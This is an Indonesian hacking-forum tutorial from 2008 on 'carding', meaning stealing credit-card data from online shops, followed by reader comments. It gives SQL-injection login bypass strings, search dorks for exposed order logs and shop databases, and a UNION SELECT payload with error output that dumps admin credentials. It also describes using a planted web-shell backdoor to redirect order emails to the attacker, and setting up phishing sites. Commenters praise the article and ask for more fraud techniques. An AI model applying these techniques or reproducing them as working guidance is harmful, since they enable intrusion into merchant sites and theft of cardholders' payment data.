Binus Hacker - Independent Hacking Community   Subscribe to Binus Hacker Subscribe to Binus Hacker

Carding Tutorial Unrestricted Information

18 November 2008
Penulis: UtuH   · Kategori Artikel: Cracking

Binus Hacker Sponsor Banner


Hello, kembali lagi gwe buad artikel :)
Ini berhubungan dengan carding loh, yang seyogyanya anda udah tau semua dengan apa itu carding. Ini hal yang sangat menarik untuk di bahas dalam masalah ini. Ada beberapa teknik yang perlu anda ketahui tentang bagaimana itu carding.

Pertama, gw akan jelaskan beberapa teknik menarik yang patut anda pelajari.
Udah lom ne gw ceramahnya.. Wkwkwkw.. Oke dah lanjut ya kita mulai, jangan lupa bilang terima kasih banyak sama paman google ya ( search engine yang pasti gw gunain dan menjadi guru dari pembelajaran dalam hal ini ).. Lets Go:

1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic

  • Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:
    admin:’ or a=a–
    admin:’ or 1=1–
    user:’ or 1=1–
    admin:’ or 1=1–
    dsb
    Contoh:
    Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
    Misal target :
    http://www.namasitusnya.com/shop/admin/shopadmin.asp
    Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)

    • 2. Shopping Order Log – Informasi Log Order di Server

  • Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
    Contoh:
    Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
    atau inurl:order filetype:txt / inurl:order filetype:log dsb.
    Misal target:
    http://www.namasitusnya.net/shop/admin/log/order.log
    http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
    http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt
    Selamat menemukan :)

    • 3. Database Information – Database Source Location – Database Path

  • Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.
    Contoh:
    Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
    atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
    Misal target:
    http://www.namasitusnya.com/shop/shopadmin/database.mdb
    http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
    http://www.namasitusnya.com/fpdb/shop.mdb
    http://www.namasitusnya.com/shopping/data/vsproducts.mdb
    Selamat mencari.. ^^

    • 4. SQL Injection Advanced Shop Vulnreabilty

  • Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.
    Contoh:
    Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
    http://www.targetnya.com/shop/product_details.php?item_id=13
    Ganti tulisan itu dengan :
    products_rss.php?category_id=1′ UNION SELECT concat(login,char(58)
    ,password),0 FROM va_admins — /*
    jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1
    ‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
    dah kalo ada yang errornya kaya gini :

    DB ERROR 1064

    We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

    The details of the error are shown below. Please quote this in any correspondance regarding this problem.
    Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION
    %20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
    Referrer URL:
    Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
    MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line 1

    Nah klo udah jangan lupa decrypt passwordnya ya :)

    5. Admin Shop Send Mail Order

  • Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.
    Contoh:
    Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
    Misal target:
    http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php
    Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
    var $dbtype = ‘mysql’;
    var $host = ‘localhost’;
    var $user = ‘shop24_admin’;
    var $db = ‘shopsex_site’;
    var $mailer = ‘mail’;
    var $ordermailsendto = ‘ben@netboost.com.au‘;

    Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
    Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

    6. Phising & Scaming

  • Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
    Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.

    • Nah gitu ajah dech dari gw, selamat berselancar dah..
    Segala tindak tanduk jadi tanggung jawab loe sendiri..

    Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!

    Ini Gw Dedikasikan Buat BINUSHACKER MEMBER & BINUSHACKER FAMILY
    Sahabat dan temen temen gw smuanya.. Yayank gw :)
    Dan loe loe semua yang udah berkunjung ke site ini. “Enjoy & Eat It”
    Jangan lupa doain novel gw cepet selesai ya.. Thanks…

    Buad yang ngopy artikel ini, jgn lupa sertakan nama gwe ye.. Kzkzkz.. Thanks

    ==================== [ EOF ]=======================

    UtuH @ #BINUSHACKER – IRC.DAL.NET

    Tags: , , ,

    Binus Hacker Sponsor Banner

    Komentar

    23 Komentar Untuk “Carding Tutorial Unrestricted Information
    Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

    1. IndoCarder pada 7 January 2009 4:58 am

      suhu utuh sedang bercengkerama dengan carding

      mantap bos

      bos, cara ngirim ke indonya gmn ni bos?

    2. Sultan pada 8 February 2009 12:58 am

      Nice artikel
      Sedot dolo ilmunya bos Utuh

      Keren juragan :)

    3. Freddy pada 8 February 2009 12:59 am

      bAge hasiLnya dong
      Huahahahhaha…..

      Gut!

    4. ronald pada 9 February 2009 12:43 pm

      sip
      thx for this tutor

      plajarin ah, sapa tau dpt duit dadakan

    5. vanderos pada 16 February 2009 1:18 pm

      Nah skarang masalahnya bro…
      pas kita shoping,,nyari toko yg gak rese bijimane??
      trus kalo kita gunain itu cc buat paypal gmn??
      sorry kalo ade salah2 kate..

    6. boges pada 23 February 2009 8:54 am

      bos clo untuk carding paypal gmn ???
      bisa minta tutornya gak ?

    7. nugrah lucu pada 20 March 2009 10:12 pm

      dicari tukang carding buat bobol bank BCA hag hag hag kalo mau silahkan hubungi kantor polisi terdekat. hehehehe

    8. tole pada 2 May 2009 6:31 am

      sangat beda sekali dengan tulisan bang romi ya …
      emm… jadi ini sisi gelap seorang hacker btw asik juga yah..

      ^^v

    9. mccloud224 pada 9 May 2009 3:34 pm

      Jika anda tahu atau dua hal tentang transfer, kita bisa melakukan sesuatu atau dua. mccloud4shizy@yahoo.com

    10. Ebook Ads pada 20 May 2009 4:37 am

      Hello Guru, what entice you to post an article. This article was extremely interesting, especially since I was searching for thoughts on this subject last Thursday. Very good article

    11. Joshua pada 20 May 2009 11:22 pm

      TOP BANGET!

    12. spykit pada 30 May 2009 7:43 am

      huahuauha

      keren² bikin indonesia utk diblacklist utk semua negara…
      kkwakaw

      namanya teknologi uda canggih kkwakwakwa

      mau gak mau harus ikutan dunkss

      kasih ES CENDOL DOLO UTK OM UTUH,,

      UTUH IS TEGAK GAK PERNAH GOYAH,, kkwakkwakwa

    13. LezyBoi | LeftBehind pada 8 June 2009 7:31 pm

      VIVA LA Jogjs | BlakHat*09!!!!!!!!

    14. Binus Hacker » Carding Tutorial Archive pada 14 June 2009 7:07 am

      [...] ==================================== Ini hanya sebuah informasi yang perlu anda ketahui! Source from: jambihackerlink[dot]googlepages[dot]com ==================================== Jangan lupa baca juga: http://www.binushacker.net/carding-tutorial-unrestricted-information.html [...]

    15. LazyBoi pada 3 July 2009 10:07 am

      Bang bagi online shop yg bisa datengin brg ke indo dong…
      Thks………

    16. wahyudin pada 12 September 2009 9:54 pm

      ana pertamakali buka situs ini isinya bagus sekali dari dulu saya pengen bisa kaya para hacker cuma ga bisa komputer tolong dong ajarin saya gimana caranya atau langkah langkah pertama menjadi hacker untuk pemula. salam buat semuanya salam sukses selalu. kalau ada yang mau membagi ilmu silahkan kirim ke email saya wahyudin_albantani@yahoo.com

    17. madworx pada 10 November 2009 6:26 pm

      klo depannya “https://www” , bukan “http://www.”tuh gmn kang???

    18. anes pada 23 December 2009 9:14 am

      mantap banget…….klo bisa lebih detail lagi dong kak….thanks ya…..

    19. josss hacker pada 17 January 2010 9:43 am

      .. artikel ini punya Gw,,, trus di ambil tnpa izin,,,, duch kasian indonesia masih ada z copet,,, solusi yang kaya gini Gw paparin itu dikarenakan banyak yang pengen tahu bagaimana carding ,,, udah jangan ditiru

    20. Carding Tutorial Archive « THIS OCHI BLOG'S pada 26 January 2010 11:01 pm

      [...] ==================================== Ini hanya sebuah informasi yang perlu anda ketahui! Source from: jambihackerlink[dot]googlepages[dot]com ==================================== Jangan lupa baca juga: http://www.binushacker.net/carding-tutorial-unrestricted-information.html [...]

    21. MEME pada 9 April 2010 7:41 pm

      GIILLLAAAA BGI2 ADMIN DONG

    22. heru pada 28 April 2010 7:36 pm

      wah mantap…….

    23. cahyono ronaldo pada 6 May 2010 10:42 am

      Cara decrypt password gimana ya???
      maklum newbie nih

    Silahkan Berikan Tanggapan Anda...